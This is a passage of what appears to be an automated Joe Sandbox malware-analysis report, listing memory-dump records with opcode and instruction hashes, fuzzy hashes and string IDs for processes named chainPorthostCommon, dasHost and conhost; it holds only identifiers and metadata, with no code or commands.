                                                                                    • Instruction ID: 9baded12b1604edbc2eb12ceec086a47201f661f8c663b4e58f9a3816c87e6f6
                                                                                    • Opcode Fuzzy Hash: 1367fdd2635cb4d8773ceb5b7bac313d56898e9429c9d2f2352ac406217a34ce
                                                                                    • Instruction Fuzzy Hash: CE012120E9D91D4AE7A5B61888B57BC61A1EF4B700F5001B5D91DE3292ED3E6D44A740
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.3034614781.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_7ffd343d0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5e9778df4750084cb75aec90f917a2514228f83ca38fe3945c032ecbe2bdda72
                                                                                    • Instruction ID: 7dddf225c71f9e7a0ec9b22fc1032d6338144fc44058bdbccf12c89b7a2c25cf
                                                                                    • Opcode Fuzzy Hash: 5e9778df4750084cb75aec90f917a2514228f83ca38fe3945c032ecbe2bdda72
                                                                                    • Instruction Fuzzy Hash: 57016D30A9D40E8AEBA8BA04D8A5BF872A5EF16300F5001B9D90ED31A1EE3D29C55A41
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.3034614781.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_7ffd343d0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8fde1c70c65ee5f2c51e3bfbdebf05f195a66c6b070661791eb3dbd4f6e18495
                                                                                    • Instruction ID: b138bdf6ada42a5344b5108d1015447a0bf97a31047aad3af935477e2d8f3502
                                                                                    • Opcode Fuzzy Hash: 8fde1c70c65ee5f2c51e3bfbdebf05f195a66c6b070661791eb3dbd4f6e18495
                                                                                    • Instruction Fuzzy Hash: C5015E35A0E7888FD712EB68C8941DDBFB0AF43314F1545EAC580DB1A2D5395A48D781
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.3034614781.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_7ffd343d0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 12a96deac0bd4955494dc3d168b56832fbc6f55d268f1912c6cad2976de6fede
                                                                                    • Instruction ID: 78b813822bb6fb3480f407154d56933906b57fab519dfd86370db21264ddac0f
                                                                                    • Opcode Fuzzy Hash: 12a96deac0bd4955494dc3d168b56832fbc6f55d268f1912c6cad2976de6fede
                                                                                    • Instruction Fuzzy Hash: BAF02B22F4D40A4BFB64F608C8A52EC3396EB92310F404672D40DC72D6DE2DAD0283C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.3034614781.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_7ffd343e0000_chainPorthostCommon.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    • API String ID: 0-2096274016
                                                                                    • Opcode ID: 411d86c1bfb946d734567938dcbbefb9b2015b4658ac4557d5aea9a35dd82040
                                                                                    • Instruction ID: a14a72318c7ec76315454ec4e5efe4a62258776237d7ec86b4029b4208569d4a
                                                                                    • Opcode Fuzzy Hash: 411d86c1bfb946d734567938dcbbefb9b2015b4658ac4557d5aea9a35dd82040
                                                                                    • Instruction Fuzzy Hash: D5415A12B4E6650EE715B7BC60B52F977A0EF8A335B1444BBD14DC7193CE2EA8818280
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7H4
                                                                                    • API String ID: 0-2096274016
                                                                                    • Opcode ID: 00b3e42036dbdc8d9126ac2013830192ec52013f3a263be00984c0b8d4492d34
                                                                                    • Instruction ID: a56b534c8b551947b2a72a8b10a0e57ecbdcfe691d3aad1a9345f8ef3d68b98a
                                                                                    • Opcode Fuzzy Hash: 00b3e42036dbdc8d9126ac2013830192ec52013f3a263be00984c0b8d4492d34
                                                                                    • Instruction Fuzzy Hash: 7431F511B5DA190BE764B7AC64A66F973D5EF8A325F14447AE40DC3193CD2EA8814280
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7H4
                                                                                    • API String ID: 0-2096274016
                                                                                    • Opcode ID: df39afef0823d02d18d1a163114300de07c630b62e184ae91941129eb9d3260d
                                                                                    • Instruction ID: 3845c1f0c983a831089d96379248e9cd326c1c35aac3c2eaa51b999006eb21b9
                                                                                    • Opcode Fuzzy Hash: df39afef0823d02d18d1a163114300de07c630b62e184ae91941129eb9d3260d
                                                                                    • Instruction Fuzzy Hash: EE210620B5E9590FE758F76C94A96BA76D1EB8E321F0400BDE50EC32A3DD3DAC418340
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343e0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: I
                                                                                    • API String ID: 0-3707901625
                                                                                    • Opcode ID: e48cee1027e4841cd7602fc842a062a82e6595f5f54977bb866b62b32c35afe8
                                                                                    • Instruction ID: ac234ff9dbf8d27131357c6d54bdfd49a1db4cf95054320098e49e93c8bd06fc
                                                                                    • Opcode Fuzzy Hash: e48cee1027e4841cd7602fc842a062a82e6595f5f54977bb866b62b32c35afe8
                                                                                    • Instruction Fuzzy Hash: CFE0127194B3C04FCB49EB3584A58957F60EF6721078E50EEC145CF1A3D62DD889C701
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ef215402e1e86f29e70935aa36f7b35429288cad16b5c91567dc0ee189e92fd1
                                                                                    • Instruction ID: be35c329a25de28fb6bffa370a1d67d050df2c2ce259af4d6516cd5208a135db
                                                                                    • Opcode Fuzzy Hash: ef215402e1e86f29e70935aa36f7b35429288cad16b5c91567dc0ee189e92fd1
                                                                                    • Instruction Fuzzy Hash: 5E31A431A0D68A8FDF46EB64C8A59A97BF0FF5B310B0805BBC009D71A3DA3DA845C751
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343e0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2a3d4a8cb6b01cbd010a4e1143d644816fa0991be4ca169069b2ba15371c8f90
                                                                                    • Instruction ID: 16730eecb014001220e6d03103163e549e39bf20a6326f1ee845c9ce7bffd559
                                                                                    • Opcode Fuzzy Hash: 2a3d4a8cb6b01cbd010a4e1143d644816fa0991be4ca169069b2ba15371c8f90
                                                                                    • Instruction Fuzzy Hash: 1821B032F0951B8AEB54EB48D8A56BF77A2FF65300F04063AC219D7281DF7969819780
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: df00a4066b643880c2d59f1cc06834a4a3d84e103eada8c39de2040a8cccdad3
                                                                                    • Instruction ID: 24eda12cd9a6022ea02aa2f8bf9272e9b29073fb4f36e0cb2ed3e6b450d99e4f
                                                                                    • Opcode Fuzzy Hash: df00a4066b643880c2d59f1cc06834a4a3d84e103eada8c39de2040a8cccdad3
                                                                                    • Instruction Fuzzy Hash: 21210135B0E2898FE712EB2888A51DC7FB0EF83329F1445B7C280DF192D5391A4AA741
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: feb6da0effec433ac78246fa435cad5f14201ff76e807aeacd30111fc7347779
                                                                                    • Instruction ID: 3f96e98a21404424cbaacd5540ac77989398d89523c784de7e1146948ce8a7b1
                                                                                    • Opcode Fuzzy Hash: feb6da0effec433ac78246fa435cad5f14201ff76e807aeacd30111fc7347779
                                                                                    • Instruction Fuzzy Hash: D111CE35B0E7888FE702EB2898A42DD7FB0EF83319F1544B7C284DF292D5391A499780
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e5b5af8b14389f6b2f348cb39dc5740f57e578ee045d4c683d3caf629a47149b
                                                                                    • Instruction ID: 6541a784fb46a1b52f8c29ef641667630fa5a2dcfa7baf3616abb2f26d24beba
                                                                                    • Opcode Fuzzy Hash: e5b5af8b14389f6b2f348cb39dc5740f57e578ee045d4c683d3caf629a47149b
                                                                                    • Instruction Fuzzy Hash: 1001AD35A0E7888FE702EB2884A42DD7FB0EF43314F1545EAC180DB292D5395A489B80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1367fdd2635cb4d8773ceb5b7bac313d56898e9429c9d2f2352ac406217a34ce
                                                                                    • Instruction ID: 9baded12b1604edbc2eb12ceec086a47201f661f8c663b4e58f9a3816c87e6f6
                                                                                    • Opcode Fuzzy Hash: 1367fdd2635cb4d8773ceb5b7bac313d56898e9429c9d2f2352ac406217a34ce
                                                                                    • Instruction Fuzzy Hash: CE012120E9D91D4AE7A5B61888B57BC61A1EF4B700F5001B5D91DE3292ED3E6D44A740
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5e9778df4750084cb75aec90f917a2514228f83ca38fe3945c032ecbe2bdda72
                                                                                    • Instruction ID: 7dddf225c71f9e7a0ec9b22fc1032d6338144fc44058bdbccf12c89b7a2c25cf
                                                                                    • Opcode Fuzzy Hash: 5e9778df4750084cb75aec90f917a2514228f83ca38fe3945c032ecbe2bdda72
                                                                                    • Instruction Fuzzy Hash: 57016D30A9D40E8AEBA8BA04D8A5BF872A5EF16300F5001B9D90ED31A1EE3D29C55A41
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8fde1c70c65ee5f2c51e3bfbdebf05f195a66c6b070661791eb3dbd4f6e18495
                                                                                    • Instruction ID: b138bdf6ada42a5344b5108d1015447a0bf97a31047aad3af935477e2d8f3502
                                                                                    • Opcode Fuzzy Hash: 8fde1c70c65ee5f2c51e3bfbdebf05f195a66c6b070661791eb3dbd4f6e18495
                                                                                    • Instruction Fuzzy Hash: C5015E35A0E7888FD712EB68C8941DDBFB0AF43314F1545EAC580DB1A2D5395A48D781
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343e0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1407730606941bfbf97eaf5ae90038af5f0a997c12730fea3fd74f12118de58c
                                                                                    • Instruction ID: 386b182c20c208d2bee0d42123dfc94c76ab60b6edef46894ea0c5397d75f9dd
                                                                                    • Opcode Fuzzy Hash: 1407730606941bfbf97eaf5ae90038af5f0a997c12730fea3fd74f12118de58c
                                                                                    • Instruction Fuzzy Hash: 93F0A432F4951E8FEB58EB44C8A54BE73A1FB69310F04063AC11AD7390DF7869408740
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a8829bf4592e40ae3b4fada442c1efe27b7aec2c3418eee2fc3db957c814b10c
                                                                                    • Instruction ID: 220322e8e1aa441e93854d38f7731614a4ebb86235473affcf0ae8e436dd0677
                                                                                    • Opcode Fuzzy Hash: a8829bf4592e40ae3b4fada442c1efe27b7aec2c3418eee2fc3db957c814b10c
                                                                                    • Instruction Fuzzy Hash: B9018F34A0E3888FE712EB6484941DDBFF0AF03308F1441EAC580DB192D9395A48C741
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e755c29a42b3ce14799ff74ec821416fd7e1b032b190bc4a9802ed2d1bd81a7d
                                                                                    • Instruction ID: 1024ff713126171387a3fc8aeef8a02c854a77d489bb69c09cd9b6fa1afbf811
                                                                                    • Opcode Fuzzy Hash: e755c29a42b3ce14799ff74ec821416fd7e1b032b190bc4a9802ed2d1bd81a7d
                                                                                    • Instruction Fuzzy Hash: 01E07D3232D94E4FDF02FB3CDC974A83B50EB8B21078700FAD108CB0A2C212684E8B01
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3578a717b9436a7b1dcc73c890f639642e3fdd1b05cd7d681b05ec1eb709d8e1
                                                                                    • Instruction ID: 3c8bdbd3cc9de207283bf3e4dc6e0eced58735e26f9e0f4cb0717be08df592d4
                                                                                    • Opcode Fuzzy Hash: 3578a717b9436a7b1dcc73c890f639642e3fdd1b05cd7d681b05ec1eb709d8e1
                                                                                    • Instruction Fuzzy Hash: CFF0E521F4D4174BF729F244C8A05FE219A9B42320F594276D81FC32C6DE5DAE0193C5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343e0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5fb093ff02a71e26105fccf7503ed6f1ae4011e19121ff59a0269e74ada4076c
                                                                                    • Instruction ID: 4640bb846717c77e64037ae798f4c740fb56b9dcadbfe4fc94d7acd97375bf17
                                                                                    • Opcode Fuzzy Hash: 5fb093ff02a71e26105fccf7503ed6f1ae4011e19121ff59a0269e74ada4076c
                                                                                    • Instruction Fuzzy Hash: B5D05E30B609094B8B0CB62D8458430F3D1E7AA6067945278D44BC3285ED2AECC68B80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343e0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 8IH4$@[H4$H_H4$XxH4$zG4$qH4
                                                                                    • API String ID: 0-690594405
                                                                                    • Opcode ID: 632cccd9c0abcde26b55bcf95101c6d94b2ad3ebb3d93b9f18f98ae62bb94a3c
                                                                                    • Instruction ID: 8d27fc0d85df868da20cf4dbe4fbc8b9cb05e9de7e2671b4ab87ea2f7f1ef0d1
                                                                                    • Opcode Fuzzy Hash: 632cccd9c0abcde26b55bcf95101c6d94b2ad3ebb3d93b9f18f98ae62bb94a3c
                                                                                    • Instruction Fuzzy Hash: 97D2A432B5D95A4FEF98FB1884A16A9B3D2FF95300F1445B9D50ED3282CE39BC829741
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343e0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 8IH4$@[H4$H_H4$XxH4$zG4$qH4
                                                                                    • API String ID: 0-690594405
                                                                                    • Opcode ID: 6e648265cd352e961bed5e5a7c1760d5b5eb47c9e7ee7e13c28c8907e99cdb86
                                                                                    • Instruction ID: 3cff36aa18058c8d6851b6568837685db15a7598d239f66d065c7ef9bd230d70
                                                                                    • Opcode Fuzzy Hash: 6e648265cd352e961bed5e5a7c1760d5b5eb47c9e7ee7e13c28c8907e99cdb86
                                                                                    • Instruction Fuzzy Hash: B992A222B5D95A4FEB98FB1884A17B5B3D1FF95300F1845B9D50ED32C2CE39AC829B41
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343e0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @[H4$H_H4$XxH4$qH4
                                                                                    • API String ID: 0-3035333748
                                                                                    • Opcode ID: 1565b5f7b03837fad5f1f6c7266dc412a605aca0cb350404b582181472890f2a
                                                                                    • Instruction ID: ba2a1f866f4fb964064196cbadf73603294a57b18cb05496c3d3d4361aea1518
                                                                                    • Opcode Fuzzy Hash: 1565b5f7b03837fad5f1f6c7266dc412a605aca0cb350404b582181472890f2a
                                                                                    • Instruction Fuzzy Hash: EC72A222B5D91A4FEB98FB1884A17B5B3D1FF95300F1845B9D50ED32C6CD39AC829B41
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343e0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @[H4$H_H4$XxH4$qH4
                                                                                    • API String ID: 0-3035333748
                                                                                    • Opcode ID: 0416b9afad3ecec9d05b68ef4bcf2bbe5ca337b8b7e1c672db5cf76cb54c50e9
                                                                                    • Instruction ID: 614d548cbd275ff6427719a62fd3421625647ce32aca0769009ad79be7bc2b1e
                                                                                    • Opcode Fuzzy Hash: 0416b9afad3ecec9d05b68ef4bcf2bbe5ca337b8b7e1c672db5cf76cb54c50e9
                                                                                    • Instruction Fuzzy Hash: FE62A222B5D91A4FEB98FB1884A17B5B3E1FF95300F1845B9D50ED32C6CD39AC829B41
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343e0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @[H4$H_H4$XxH4$qH4
                                                                                    • API String ID: 0-3035333748
                                                                                    • Opcode ID: 80415954f0215c76690531a9933b9abc59f5affb2751551a7f9393e4afe71d77
                                                                                    • Instruction ID: d1c0ed77eaeae106c969d8313abef4b60a976737e4935b2cb26e3924e642a3e6
                                                                                    • Opcode Fuzzy Hash: 80415954f0215c76690531a9933b9abc59f5affb2751551a7f9393e4afe71d77
                                                                                    • Instruction Fuzzy Hash: 03629222B5D91A4FEB98FB1884A17B5B3E1FF95300F1845B9D50DD32C6CE39AC829B41
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343e0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @[H4$H_H4$XxH4$qH4
                                                                                    • API String ID: 0-3035333748
                                                                                    • Opcode ID: 328873043357d79cb41c36714ec80a25fea30ff9a5f2e37ba539a2f7bada8328
                                                                                    • Instruction ID: 70ea46b44147ee68d68d99c566051b9339d9fa6bbe51bb6529b9abea9028de27
                                                                                    • Opcode Fuzzy Hash: 328873043357d79cb41c36714ec80a25fea30ff9a5f2e37ba539a2f7bada8328
                                                                                    • Instruction Fuzzy Hash: 63629222B5D91A4FEB98FB1884A17B5B3E1FF95300F1845B9D50DD32C6CE39AC829B41
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343e0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @[H4$H_H4$XxH4$qH4
                                                                                    • API String ID: 0-3035333748
                                                                                    • Opcode ID: e03d0db45975ed722a1bee357286be69dd32046ecf85515628abe50aaafef993
                                                                                    • Instruction ID: dbb534a5f03424f85c7be8e419df4e1ada17f458e4dcaedaf0e73104eee45528
                                                                                    • Opcode Fuzzy Hash: e03d0db45975ed722a1bee357286be69dd32046ecf85515628abe50aaafef993
                                                                                    • Instruction Fuzzy Hash: 04629222B5D91A4FEB98FB1884A17B5B3E1FF95300F1845B9D50DD32C6CE39AC829B41
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343e0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @[H4$H_H4$XxH4$qH4
                                                                                    • API String ID: 0-3035333748
                                                                                    • Opcode ID: 07eac8f12ce4cbcafa3f5b7fc8531aa548a98230e636d288610d8851fd9d8835
                                                                                    • Instruction ID: 4dc864a854bab4b9f722624ef7c7b4fb4beead4f7b0e258b98730c6860c2ef67
                                                                                    • Opcode Fuzzy Hash: 07eac8f12ce4cbcafa3f5b7fc8531aa548a98230e636d288610d8851fd9d8835
                                                                                    • Instruction Fuzzy Hash: B7629222B5D91A4FEB98FB1884A17B5B3E1FF95300F1845B9D50DD32C6CE39AC829B41
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343e0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @[H4$H_H4$XxH4$qH4
                                                                                    • API String ID: 0-3035333748
                                                                                    • Opcode ID: 32ef6a4f5fd9714169a718f1dbc4a042592a94de2cebdf0a3c39c6fa33a7329e
                                                                                    • Instruction ID: f81f13c9dff5c02893cf5d8cf36a3775a223c385845e00fbd5414fb25a5c01d5
                                                                                    • Opcode Fuzzy Hash: 32ef6a4f5fd9714169a718f1dbc4a042592a94de2cebdf0a3c39c6fa33a7329e
                                                                                    • Instruction Fuzzy Hash: B5629222B5D91A4FEB98FB1884A17B5B3E1FF95300F1845B9D50DD32C6CE39AC829B41
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 5[_H
                                                                                    • API String ID: 0-3279724263
                                                                                    • Opcode ID: a8dfdafaef71384e31f532012ce8ff2562aca210eb232f135fae636a7fdab404
                                                                                    • Instruction ID: f941329fe6c05d008d6c6ff8601ca06024043b23c272ee6c2d324e59b47c3596
                                                                                    • Opcode Fuzzy Hash: a8dfdafaef71384e31f532012ce8ff2562aca210eb232f135fae636a7fdab404
                                                                                    • Instruction Fuzzy Hash: 9B91B0B5A19A898FE799EB68C8757E97FE1FB96304F1500BBC04AD73D2CA791811C700
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1921f275748427feef736a07e044e66e72c4b71d1f9aef1313907bb55bf3834f
                                                                                    • Instruction ID: 20a606fe27131df32759ff635d5cd2c86a56bf4d204fa01adb76650b44b8b2b5
                                                                                    • Opcode Fuzzy Hash: 1921f275748427feef736a07e044e66e72c4b71d1f9aef1313907bb55bf3834f
